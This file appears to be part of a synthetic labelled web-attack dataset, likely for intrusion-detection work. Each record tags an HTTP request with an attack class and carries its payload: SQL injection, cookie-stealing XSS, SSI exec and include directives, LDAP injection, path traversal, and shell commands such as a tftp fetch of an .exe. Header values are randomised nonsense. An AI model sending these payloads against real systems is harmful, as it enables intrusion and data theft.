X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38711
Start - Id: 39310
class: SSI
GET /t5LOtaeeSrxnfeneem/OaakesieLdnWPi5/breryeas28nnp/jrI_zW55WdM/rerdt/iuyUt@A1.n9xx12paGRO/sbOdlEeetenOtcdns/nMittp@Fpg/3j-m@.shX.dll?auhtusiopDs5g=ybd7K&rm9atIF=uzu5EY6&In3eeiytuezT=354472&imeOndnbgs1dste=ecIetoavneh&thli67aeuel=%3C%21--%23email+fromhost%3D%22www.nnwAat.com%22+tohost%3D%22mailbox.eklD.com%22+message%3D%22a5Kk+utiher6+io+A3siru%22+fromaddress%3D%22oeenT.com%22+toaddress%3D%22ost.osnidm.com%22+subject%3D%22t%22+sender%3D%22i1a.com%22+replyto%3D%22ireeigm.com%22+cc%3D%22d1%22+inreplyto%3D%22mshum+dae+5reehu%22+id%3D%22lxremail%22+--%3E&Enyvn=399112&aojbvnsw3ce=9&emolw=bYIlJzUyw&htetscut=adcet2occ4&wraal5tN=%5Cw%7E&0iaefiru=l+oeomb&e5tEoceoam9=sWwlEv.&te1ocra=ooiTesrz1utssC&wot1mtsvo=m1eosb&sEoidfinnbobta=7140582 HTTP/1.1
Host: 168.142.83.234
Connection: yErmz
Accept: */*;q=0.5
Accept-Charset: euc-cn, windows-1253;q=0.0, windows-1258
Accept-Encoding: compress;q=0.0, gzip, deflate, gzip;q=0.6
Accept-Language: a3etece6-nrbOo, 5l9t5-lhmgof;q=0.4, ug-tualEhqw, EicskDee-n7tSCcu;q=0.5, yk-c8aesie
Cache-Control: no-store
Client-ip: 85.124.56.90
Cookie: tPtRtl=de4ensteNiAlen6
Cookie2: $Version="93"
Date: Sun, 21 May 06 13:52:35 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: niMp
From: dZei@fOseTvsS7.biz
If-Modified-Since: Thu, 06 Jan 05 15:11:47 UTC
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: *
If-None-Match: "ZVQuLT6wD8sftiDTCJ45"
If-Range: Tue, 12 Jun 07 08:00:33 CET
Max-Forwards: 822
MIME-Version: 8.9
Pragma: msaosext='ssynvaa'
Proxy-Authorization: Basic YTNzRmljdDpuaWVobHk0cA==
Authorization: gZEtif rrhftl=igoft4in
Range: 326-,2201-0740,2-99478
Referer: /ar6tsct/huaglb/e9oaio/oi3odr/nd6dnnn.js
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.4 (compatible; Konqueror/1.6; Linux i386; ocn1; 0hadns; dhinxdlrs)
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: nhaap; tiwt=Qrqbv
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 559061405127813998
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39310
Start - Id: 42998
class: OsCommanding
POST /4Y/qA6/qt9reHxtatoes.mspx? HTTP/1.1
Content-Length: 254
Content-Language: o
Content-Encoding: deflate
Content-Location: /hnri/trdjR/tgt3tY.mdb
Content-MD5: b3Ryc2IwcnlpaWRubmEwVQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 25 Jan 05 03:34:32 UTC
Host: 138.83.46.90:80
Connection: td2intjo
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.4, deflate;q=0.1
Accept-Language: 2moet0-aloT, lg-tOhh;q=0.2, la6nbise-hpaidt;q=0.5
Cache-Control: max-age=0
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="16"
Date: Fri, 29 Dec 06 20:06:55 GMT
ETag: W/"4Ee0wR1_ouwtpyf7MLY"
If-Modified-Since: Sat, 14 Jun 08 06:09:34 GMT
If-None-Match: *
Referer: /tUpehd.doc
TE: deflate,deflate;q=0.1,deflate;q=0.3
User-Agent: o4ycqL1j http://www.eqraai.be
Via: 1.3 3.66.160.188, 8.2 www.Thrl2mft.tiff
Warning: 661 218.41.109.182 "etat9dhap3oaGlsrt" "Tue, 27 Jan 09 24:39:33 UTC"
X-Forwarded-For: 225.212.15.105

zcsaQlef=fxjytEsI3y&jsuWN25U=ltsEnprrn5Ets&@boot.inigQ.TFuJ=tftp  -c  get 213.135.105.28:/ntngalan/siel.exe |&ohpt=64&ydyual5rhrcch=loghN+b:4bb&s6zlbtNGt=ncatreplaceh5&9nKyU6YW7V=5608&ybwvdPiPne=xP@&tpetatsx=thYstrin vhaft> oo&hgtsmno=@

End - Id: 42998
Start - Id: 35313
class: SqlInjection
GET /banertdn5otbcSehgl/e77lt6getinmNtun/drE4-zzWH-UxS/s8e-W3o9/e9Xp_G3twN0uVhbE5p/42wuZ0eGuSoNC/crer/eFoK8nJAzwO/j2B4y5wG9pn.xgN/iJUzQgJf.cgi?cssmo0Ret0rtstt=l7vSmr1&eeIrtt=58673315&ytxvi=457515&Ifd=msystemnl&1iuEU=sv4c&libtmpRQhtacceseZ=%27+++union+++++select++%40%40version%2C1%2C1%2C1--&ekAn6nbha6Pnava=ufrom HTTP/1.1
Host: www.xb1dA.ch
Connection: dfgs
Accept: application/rtf, image/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, gzip, compress
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 94.110.74.242
Cookie: iakhtoEi=r ;er=eee
Cookie2: $Version="1"
Date: Sat, 08 Dec 07 21:00:32 GMT
ETag: "@IHp0044BDAN5pIZOPDV"
Expect: 100-continue
From: Nlnin@tbpee7c5t.it
If-Modified-Since: Tue, 07 Dec 04 24:46:21 UTC
If-Unmodified-Since: Sun, 25 Jul 04 14:04:43 CET
If-Match: *
If-None-Match: *
If-Range: "H1Nw1_G7K32cP4-V"
Max-Forwards: 8
MIME-Version: 8.1
Pragma: ea=wijkt
Proxy-Authorization: saoa Iaepe=rennc
Authorization: Digest nonce
Range: 414018-,3-
Referer: /t8mm/vxtrl/mWt4taL/5eooAwjr/rfdpoi.swf
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: ya8FyRnS http://www.r4oieS.de
UA-CPU: Sparc
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 198x9357
Via: 3.3 100.195.92.131, FTP/9.9 www.oshtcnx.css
Transfer-Encoding: identity
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 550 www.eCnTyemt.tiff "ton0otomapoagQte" "Fri, 16 Feb 07 04:04:17 CET"
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 8712797310669
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35313
Start - Id: 42067
class: SqlInjection
GET /nanln5tssiruoe4/Vrm8wLRtRnode/apdnrweddotntr/bEMS_gghix/tX4@_7or_8wzGWQ/yBsjNzAN8/fMrdDc5qtNFKNv/LqNwogd5DeJ8/rzGyZdyAiojMExhZS.mdb?YFI1usrzxKpositionBiT=%27+%2B+%28+++++SELECT++++TOP++++1+++ratnciod+FROM+dra%29+++%2B+++%27&y-2Q2F7K6t=reixsm%3Esiets HTTP/1.1
Host: www.8drrkrden.com:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, compress;q=0.4, identity
Accept-Language: *;q=0.0
Cache-Control: min-fresh=30928
Client-ip: 18.205.184.49
Cookie: Enupln4Ie8=3hL;hihorFrinuhno=ieA;tel=9417;ennCSgel=tLsuWc
Cookie2: $Version="58"
Date: Mon, 13 Feb 06 14:22:27 UTC
ETag: "tDm1Qa_PX78EH6omh9.T"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Sun, 24 Jul 05 24:55:38 GMT
If-Unmodified-Since: Fri, 24 Aug 07 09:22:48 CET
If-Match: *
If-None-Match: *
If-Range: "53ArFZHy.hlDtssOX"
Max-Forwards: 6428
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic YTFmZm46bmhuaWti
Range: 97-55
Referer: /annwe/eShul/ce1tc/TaIf86hu/cmtiviit.js
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.7 (compatible; MSIE 3.0; Unix; asdhaie)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: compress
Upgrade: rRlEh/1.9
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 702887096
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42067
Start - Id: 47775
class: XSS
GET /.FSGX/tJ9q/i9aios/Jhatpmtilatn/inHa/NioliyMi/kho/ate/nsvGUHYlM-o.php3?CxXB2RVj8b=t&8nIn=w%5Dlic&edywtprneaszoi=3833528&BZ8uRMxmlservices=126245&lhulikeY=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++%3E%3Cscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.tiitte.com%2Fcgi-bin%2Fmelies.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E HTTP/1.1
Host: 251.200.185.125:5
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: zuof-e81nicef;q=0.1, ritelUo-p;q=0.2
Cache-Control: max-stale
Client-ip: 225.168.147.79
Cookie: rDsoeneo=6;hn=oUw1m
Cookie2: $Version="49"
Date: Tue, 14 Aug 07 10:04:39 CET
ETag: W/"Nxww7jHnVW6-iC@KeH"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Sun, 27 Dec 09 02:22:34 CET
If-Unmodified-Since: Sun, 13 Dec 09 24:37:39 CET
If-Match: "C7nb7P2qzdU4-KD.9"
If-None-Match: *
If-Range: "y4lnVD3XXfxyNn.Kvdx"
Max-Forwards: 67
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Basic ZWliYmFyeGU6aVI4Ym9yYg==
Range: 2672-661117
Referer: http://www.qo0mn.it/epuooq/luso.wmn
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Encoding
User-Agent: aepaaen5x (dOTBJO; sCw6X2j54; ebjbqX.8P)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 9.1 www.eTrrb.htm
Transfer-Encoding: gzip
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 289 www.y4tieh.html:6480 "Sn3nNaak3avt" "Sun, 06 Sep 09 14:49:12 CET"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47775
Start - Id: 43228
class: OsCommanding
GET /tuoa2wak7l/QX@1Oax/tonothsfo0aPtwar3T/OaHsQDYMEF9a_F/SArjE3ZtshutdownE1mOqp/taieorr/aj_/e.vT.jpeg?tusstargn=37146&ssca=oQmB&o7tc4=0012942&nay8n84=6010312257&elfdl=%27+%3Buftp++++-g++%2Fhome%2Fnetoorselein%2Freannitoti++232.7.82.180+++%2Fgetric+%3B&oaeshRo=09089&ng=9372276948&osnekavtdrmd=17 HTTP/1.1
Host: www.evmaaiy0to.biz
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: identity
Accept-Language: da-l;q=0.8
Cache-Control: He='ss4u'
Client-ip: 178.184.72.111
Cookie: 7m=2457;Mntlyo7o=3uoiframerepssi;rld=tcaNtudIie8aT
Cookie2: $Version="7"
Date: Sat, 30 Jul 05 05:15:53 GMT
ETag: "9rx-BTA31mnSsAa2XM1t"
Expect: cko1p=sTwOsene
From: Odth@g78cnm.uk
If-Modified-Since: Sat, 16 Jan 10 22:51:16 GMT
If-Unmodified-Since: Thu, 14 May 09 06:55:10 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Jan 04 23:18:35 CET
Max-Forwards: 38
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Digest username="9indy"
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: 31-76831,27556-
Referer: http://www.cemjsL.fr/eewd.bin
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.8 (Windows; U; WinNT 8.8; ad-aO; rv:4.2.6) Gecko/35380471
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4808x019
Via: HTTP/8.3 www.ewoa7kf3.htm, FTP/0.8 www.ehnltt.jpg, FTP/9.7 65.1.208.140
Transfer-Encoding: identity
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 539 112.163.9.207 "rxe9Jsee" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3512760212193
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43228
Start - Id: 44081
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 63.67.71.140
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: o-mn, cIsbesih-ov, ip5mnitn-rT
Cache-Control: min-fresh=5
Client-ip: 118.75.169.199
Cookie: dI2osteaqagde=omavrtjUg;rtlae=pqB5fx2I.j4p;iYLznl@P5GnX=8126;fah7risrf4htp=0139
Cookie2: $Version="4"
Date: Sat, 19 Aug 06 18:24:21 GMT
ETag: W/".Z.c4.xeA3kSTWv"
Expect: uoxvsRh=n8Csh2i;tofne7
From: eyde@enOee.biz
If-Modified-Since: Fri, 16 Nov 07 05:28:22 CET
If-Unmodified-Since: Tue, 16 Nov 04 20:48:49 GMT
If-Match: *
If-None-Match: "BrqWlOEAFHZQeSQ"
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 3282
MIME-Version: 3.4
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: http://www.Alodi.be/expgj/engoia/dlxn.jpeg
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.2 (X11; U; Linux i586 3.4; s5-sd; rv:3.6.9) Gecko/39244743
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 4959x090
Via: FTP/8.9 206.36.6.237:3, 7.6 www.onAh.html:0
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44081
Start - Id: 45288
class: PathTransversal
GET /shutcoeusoehoycGt5/autea/Yix/noeedoeat/hZnAMlbetweenAQHI52/i1enecsosh7fr/iGZY4uqwPEv2/iXN@w@i338rStOI2c7A/ae5ocEvuZtsicefst/tprbIts8adrnt.gif? HTTP/1.0
Host: 42.123.213.134
Connection: rpz3
Accept: video/*;q=0.6, text/plain;q=0.4
Accept-Charset: windows-874, euc-jp
Accept-Encoding: gzip;q=0.7, deflate;q=0.0, deflate, gzip
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 253.245.176.25
Cookie: ne0dtxe6=ipp
Cookie2: $Version="4"
Date: Tue, 23 Oct 07 15:34:24 GMT
ETag: "DSwEOuynpS7eb@UhJB-5"
Expect: ruRriaR=bioddtes;bsfxiao=2oktcsxn
From: eHayb@eTitoou.com
If-Modified-Since: Sat, 24 Apr 04 20:56:07 UTC
If-Unmodified-Since: Sat, 28 Jan 06 06:58:59 GMT
If-Match: "XEjffJGz31bk2n7Fs"
If-None-Match: *
If-Range: *
Max-Forwards: 01
Pragma: no-cache
Proxy-Authorization: Basic b1F1enNlOmR4cnFlYg==
Authorization: NTLM bnV0aG9laXJnYWxBZHZpcmxpdXB0UmZuZWllU2hudHRmZ2VvZXFidHR0QUc=
Range: 225121-24532,-519,-664374
Referer: /bdiskOue.cfm
TE: trailers
Trailer: TE
User-Agent: ..\..\..\..\WINDOWS\system.ini
UA-OS: Win9x
UA-Pixels: 689x8532
Via: jr5/7.7 67.152.192.239, 7.6 www.6ttB.htm, FTP/8.3 235.1.202.39:64
Transfer-Encoding: gzip
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 949 www.6sis2.jpg "hhuimcwsd" "Sun, 08 Oct 06 13:47:25 CET"
X-Forwarded-For: 142.15.71.240
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45288
Start - Id: 44360
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: www.etahion.it
Connection: cmsE
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.8, identity, gzip;q=0.3, identity;q=0.8
Accept-Language: *
Cache-Control: stsao='1p6qsre3'
Client-ip: 85.70.71.191
Cookie: Btizoslto91er=cmdyxli
Cookie2: $Version="4"
Date: Thu, 13 Aug 09 10:07:35 CET
ETag: "Mp0.89pM9u@RmCsjjuH"
Expect: eont=ltkcnd;tS3s
From: ks7mao@6esnaehk.it
If-Modified-Since: Mon, 05 Apr 10 24:42:55 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: ".dK6XfSKG.FdUc5gEh"
Max-Forwards: 57
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: -126597,56874-704
Referer: http://5cnet.de/Ruah.mdb
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 9.6; fe-su; rv:0.2.7) Gecko/67402564
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: compress
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44360
Start - Id: 40099
class: SSI
GET /tz1BwAiN2cBz2NQPAu/ov_qxwd84ec1TXQT/HL4Ge1_A5/ntePB.__A5sXwXZ/i3d9X4BurIKV/mayZuilS5.php3?7daahm4=wpaai9rhe&sGw=neinU&iiaNute=79418&1Yr=%3C%21--+++++%23exec+cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Fih1ye8rcR%2Fnhredpc%22+--%3E&nkBIPwq.dC=erDZtwfUv3 HTTP/1.1
Host: www.pvgaitte.uk:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, windows-1258, windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 96.12.167.70
Cookie: Omir=22698
Cookie2: $Version="5"
Date: Wed, 13 May 09 09:46:20 CET
ETag: "qLv-t8I1Jj6l-hqVR1h"
Expect: smk9rHu
From: tpzurs@nibEe.it
If-Modified-Since: Sun, 29 Nov 09 03:25:25 GMT
If-Unmodified-Since: Fri, 23 May 08 22:59:36 GMT
If-Match: "imHiby5_@8TK8jtb"
If-None-Match: *
If-Range: "YSlp-R3rBSXZ2bPVpIM"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: suerdo9Q=e
Proxy-Authorization: Digest uri=http://hOaez.ch/vyle/adcoet/ecied4i/lmeje/fyuT.htm
Authorization: Basic czBMcnNhOmhwdEI=
Range: 1646-745
Referer: http://www.ditgdeen.ch/9tlenwgn/meen/keiiq/aysmahm1/7is5se.mdb
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: egewixo5a/6.7
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 192x9251
Via: HTTP/1.9 www.egeoxevc.htm, HTTP/3.5 166.33.181.170
Transfer-Encoding: compress
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 579 74.104.76.46 "raice5uopltesn" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40099
Start - Id: 41776
class: SqlInjection
GET /yDNK_f-/aQy0wJqL8WO@gRXdZ/yq6lCcIc4SUASi1P2D/csCM@qKjuoQpeX0/d8B2p0O/o8nQbNseDg@w/lolrolt8E/nUsFIJmC_763baws@/tnbdote2Cs2c4soe6a/dQM-UeDUHzIq0afa0-Zj/lDmIlveBnJTnRlC4G/ctXWO4JLmM.qEnk.shtml?HyLhY2=metihms2anpdkap&tdlief2aahu=9n3c9kQelp2uvt&Feqnr6tv=objgtca9aEheacWt6&IsY_N0=%3D2%2BDe5&ehtghac2ttpn=+rnarnwbZAl&eSebdd2=eYTNo0&allvB_r69connectfrom=8msh&os1s4ornrvminne=%27+%29+++++UNION+++++ALL+++++SELECT++sRt+++%2C+++++nc+++%2C+++++aaWameks++FROM+++e7swh++++WHERE++rtdwzjoRg+NOT++++IN+%28+++%27iearn7%27++%29++AND+++++jrrggdqc++++NOT+++++IN+++++%28+%27tTSt5%27++++%29++++AND+++++%27%27%3D++++%27 HTTP/1.1
Host: 93.193.59.37:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale=84380
Client-ip: 19.38.3.115
Cookie: cnehsnet=eh;Imdiyromuy5db=S;ae=844715;OYiY4OimgzT6gq=8bMC
Cookie2: $Version="312"
Date: Mon, 20 Oct 08 16:00:33 UTC
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: ia8noW=tmIwhd;msh6Hdo=uZenci
From: edbsae7@m3iuOei.biz
If-Modified-Since: Mon, 25 Apr 05 05:39:38 CET
If-Unmodified-Since: Thu, 14 Jul 05 14:53:11 GMT
If-Match: *
If-None-Match: "LRau5c1.zz3-yDhGd15"
If-Range: *
Max-Forwards: 886
MIME-Version: 3.1
Pragma: 4flri3=s
Proxy-Authorization: Digest cnonce="ayrepssY"
Authorization: Digest uri=http://www.oatedeu.it/lhcqn/Azdf/riKs/t4m9mja/r5dp.tiff
Range: 4745-5836
Referer: http://Peenheu.be/9oet/na0i/liiyet.fgf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: iaroaee (oa@x77nE4d; oYc29n3sEp; oTM61z)
UA-CPU: x86
UA-Disp: 079,3300,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: HTTP/5.4 www.eXara.jpg, suc/1.2 www.ehed3r.js:55
Transfer-Encoding: deflate
Upgrade: ped/5.7, utiwa/4.3, NDinca/1.6, HleG/8.5, 6ot/6.6
Warning: 033 232.84.135.234 "we7ecsEbGih0" 
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41776
Start - Id: 36714
class: OsCommanding
GET /Nin3metxo1dfIshree/a3GGeUWG9r3e2C4RU/hibnt0pxc7atdo9ocaep.mspx?onTiebiw=%5Cn++uftp+-p++www.iera.com+%2Fen%2Fndtrtr%2Fngar%2Fsiar%2Fenng%2Fto HTTP/1.0
Host: www.oeeailU.fr
Connection: nubeNl
Accept: */*
Accept-Charset: iso-8859-1;q=0.3, x-mac-ce;q=0.4, hz-gb-2312;q=0.2, windows-1254
Accept-Encoding: 
Accept-Language: znpdv-li, o-nns, hPq-ix;q=0.0
Cache-Control: min-fresh=91812
Cookie: 1atroapreyc=oneb;tnoisee9lnte=zth&;l8iqCSnki=j6dh;nea4eliltn8sar=660;tPawoEv=224717;featif72yIih=iee37
Date: Sun, 12 Jul 09 22:26:03 UTC
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: gcde
If-Modified-Since: Mon, 12 Jan 09 16:12:21 UTC
If-Match: "iVFml@WnD9Z0eePYb"
If-Range: Fri, 28 Aug 09 15:43:19 CET
Max-Forwards: 7
Pragma: no-cache
Authorization: NTLM c21zb2Vlcm1lVGVoT2Vhc2tSN2ljU3VzemNpeGpPdGF0bHNOdHdlc3VuQQ==
Range: 563-2,585502-,9-74
Referer: http://AmnE.biz/meo7/lmiUwC/rlaoennt/nrcytE/iqigk0lc.asmx
TE: deflate,gzip;q=0.2
User-Agent: cbYxU5135X http://www.tilesoei.cz
Transfer-Encoding: 45a7
X-Forwarded-For: 18.24.168.27

null

End - Id: 36714
Start - Id: 40388
class: SSI
GET /ar/iiuuaraiike/ulieelh/anoqssnarhtOIllg/yunsRtnbp/Thttpf78cQKYO/eDLKLRvpYIngZ6Ikfkek/1bpehBataHuzzu9ia/ibonriegeic8nLss8c/bC2exH.pFWrfGW/fkpaZd7yGCgd9a8KBaJh/Ralnwhshl8a9cywo.js?MHl.5OuxZRF=62&cHe41ln5bdt=iaw%40GN4ZecGw&stwesbdnikhaP=+stwOis8muasohts%3AE9&rae9aHenhbueaq=yxp_ot%28DcEinnt%5CNEpositionp%3Btmps&n9a3arnpOarr=hgraphdreideu&Fos2o5aWlyytade=zLfcsPl0&9r=4ryC&tseHe=rimdhHrd&6nc=fTniwse%3Fepzt&Ttfntllpcost6=ddsnedh%3E&inGvc=h1&sxdtbroe3F=UAoosrksoqkt HTTP/1.0
Host: www.iig6.cz
Connection: close
Accept: application/postscript, application/x-tar;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Cookie: @meta2xb-=<!--    #include  virtual="d:\windows\autoexec.bat"  -->;SS=kro;cpErlee5ek=kmindtD;atm=pEedesetcr;co=hr=deleteu
Date: Tue, 01 Sep 09 10:06:32 CET
If-Unmodified-Since: Sun, 20 Sep 09 20:46:16 UTC
If-None-Match: *
MIME-Version: 2.6
Proxy-Authorization: Basic aGlsdDp0ZGxtZg==
Referer: /sWcIsxnc/pvIaeh.gif
User-Agent: ocao3ep/3.2.5

null

End - Id: 40388
Start - Id: 37864
class: LdapInjection
GET /rFkPjJdo/gYH2hhMTHvKKYo/R6jFMPdc/rm0Zqo02Fn@x2QjsSsh5/oeineewopomjnzlf/57LCH/LdetttfP/es7aohgoy4ebhq.asmx?rihbee5bde=%29%28+%7C+++%28displayName%3Dhad*%29+++%28name+%3D+++had*+%29%28+mail%3Dhad*++%29&szslnDi=iCoaF_&eta=3391647195&urIHhe0tgnexskn=590462865&faratleer9=99 HTTP/1.1
Host: 35.12.255.85
Connection: keep-alive
Accept: image/jpeg;q=0.5, image/jpeg
Accept-Charset: iso-8859-6;q=0.2, iso-8859-2;q=0.2, us-ascii
Accept-Encoding: *
Accept-Language: ajaid3-eg, stnhac-ndh5htz;q=0.3
Cache-Control: no-cache
Client-ip: 187.8.190.251
Cookie: tsboBouTeh2=097;9Baccepttf25gvWzO=qadocumentj;cqT6d=47715776;feg3g=sock_streamfham;n2ttra=rila;hoBbzii9eesqh=vEbfu asho5
Cookie2: $Version="7"
Date: Fri, 29 May 09 14:50:06 UTC
ETag: W/"QGw7GJrbe-NEJrg0bH"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 10 Mar 09 19:19:26 GMT
If-Unmodified-Since: Sat, 27 Jun 09 07:00:07 GMT
If-Match: "c6FC5Mm@FvNAWs."
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 4.6
Pragma: ts=rysmnrx
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: NTLM cG1mbHRxRXVpbnI5bHRpb3Rpb2E3d25lYWxkcDRpbnlzb3Q=
Range: 3-43,-454,28574-
Referer: /ci1tr.cfm
TE: trailers,chunked;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: ra3drj/9.7.6
UA-CPU: Sparc
UA-Disp: 8628,0806,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 223.104.48.29
X-Serial-Number: 300384
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37864
Start - Id: 49877
class: XPathInjection
